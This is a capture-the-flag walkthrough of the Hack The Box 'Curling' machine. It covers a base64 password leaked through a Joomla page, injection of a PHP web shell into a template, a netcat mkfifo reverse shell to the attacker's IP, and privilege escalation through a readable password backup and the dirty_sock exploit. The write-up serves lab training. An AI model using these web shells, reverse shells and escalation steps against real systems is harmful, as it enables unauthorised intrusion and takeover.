Again, we start with nmap -sC -sV -oA ./curling 10.10.10.150
Ok. Let's jump straight into the web service. We see from the nmap output that this site is running Joomla!
From the main page, we catch 2 names. The "Written By" name of Super User, and the signature on the "My first post of Curling in 2018" name of floris. Checking the source code, we also see a secret.txt comment between the closing body
and closing HTML tags (below the footer).
If we navigate to http://10.10.10.150/secret.txt, we are given a string of "Q3VybGluZzIwMTgh". We can decode in cli or a https://www.base64decode.org/.
In cli, it would be 'echo Q3VybGluZzIwMTgh | base64 -d'. Either way, the output is 'Curling2018!'. While we were digging through source code and decoding secret.txt, we already had Dirbuster doing its thing. Among the items it finds
is an administrator login page located http://10.10.10.150/administrator/. Let's try floris:Curling2018! first and we are now into the Joomla Control Panel. Now that we have access to the contol panel, let's see what vulnerabilities are in Joomla 3.8.8. After searching a while, I look back at the Control Panel and check out the different (2) templates. Protostar has the most promise. So, after selecting Templates in the Configuration list, selecting Templates in the Templates: Templates (Site) page, and selecting Protostar Details and Files, I am brought to a Customise page that asks me to select a file.
I choose index.php. Now let's add a system request 'system($_REQUEST['rce']);' to get RCE working (hopefully and remove the outer ' marks).
We save that and try to navigate to index.php?rce[simple command]. I tried cat /etc/passwd and the same with url encoding. Both failed. At this point, I'm not sure that my RCE is working, so let me try hostname and whoami.
OK. RCE is definitely working. So, 'cat /etc/passwd' must be too complex a command. Using the netcat reverse shell from Pentest Monkey's Reverse Shell Cheatsheet, I try to add
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.X.X 1234 >/tmp/f
to the template, but I take out the $_REQUEST piece. Set up a netcat listener to the port (1234 is what I used on mine). As soon as I save the template and refresh the home page, instant www-data shell. Time to look around. Navigate to the /tmp folder, set up a SimpleHTTPServer on your machine and use wget to copy LinEnum.sh to the target machine. Change the permissions and run it with -t.
On attacking machine:
:/LinEnum$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
chmod 777 LinEnum.sh
./LinEnum.sh -t > output.txt
I output mine to a txt file that I then move to my machine so that I can copy the results into the CTB file. That being said, if you look in the "Post-Exploitation > Script Results" and find line 6140 of the LinEnum output, we find out that
/home/floris/password_backup is world readable. Oops. Somebody goofed on that one.
We can navigate to /home/floris but we can't open anything but the password_backup. Which contains:
Nice HEXDUMP ya got there. Would be a shame if someone reversed it......
Create a file on the attacking machine and paste that into it. I used the name hexdump. Then use xxd to reverse it.
Looks like floris has a password of '5d<wdCbdZu)|hChXll' What can we do with it? Well, we can ssh with it. That SSH just yeilded us the User Flag. On to ROOT!
LinEnum output and manual searches on the box are not yeilding a whole lot of information that I can use. Floris cannot sudo as anything and Floris can't view cron jobs. That doesn't mean those cronjobs aren't there.
Let's see if pspy will run. We can download PSPY here and then use the usual to get it from attacker to victim.
After a minute or so, we see an interesting couple of items.
What does curl -K do? It sets a config file for a cron job. See, there IS a cronjob running. Let's take a look at the admin-area/input file.
floris@curling:~/admin-area$ ls -la
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 Mar 31 14:44 ..
-rw-rw---- 1 root floris 25 Mar 31 14:54 input
-rw-rw---- 1 root floris 14248 Mar 31 14:54 report
The input file that the job is looking for is owned by the floris group. That means I can make changes to it. Also, the -o in the pspy output outputs the cronjob information to the report file.
Let's look back at the LinEnum output.
This is a Ubuntu box with a 18.104.22.168 kernel. I seem to remember a vuln called "dirty sock" that exploits the snap version on this kernel. Snagging the PoC code at https://github.com/initstring/dirty_sock, we transfer it over to the victim machine and run it. Once it completes, you can su to dirty_sock, and then sudo su to root and get the root shell.